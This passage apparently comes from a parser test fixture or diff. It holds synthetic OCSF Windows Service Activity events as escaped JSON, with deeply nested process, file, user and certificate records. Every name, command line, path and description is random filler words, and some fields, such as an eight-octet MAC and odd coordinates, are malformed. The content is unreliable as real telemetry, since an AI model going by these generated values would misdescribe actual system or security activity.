\"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers 
families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations 
cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}" + }, + "expected": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, 
{\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": 
\"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": 
\"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": 
\"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": 
\"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": 
\"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": 
\"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": 
\"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": 
\"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": 
\"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds 
match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": 
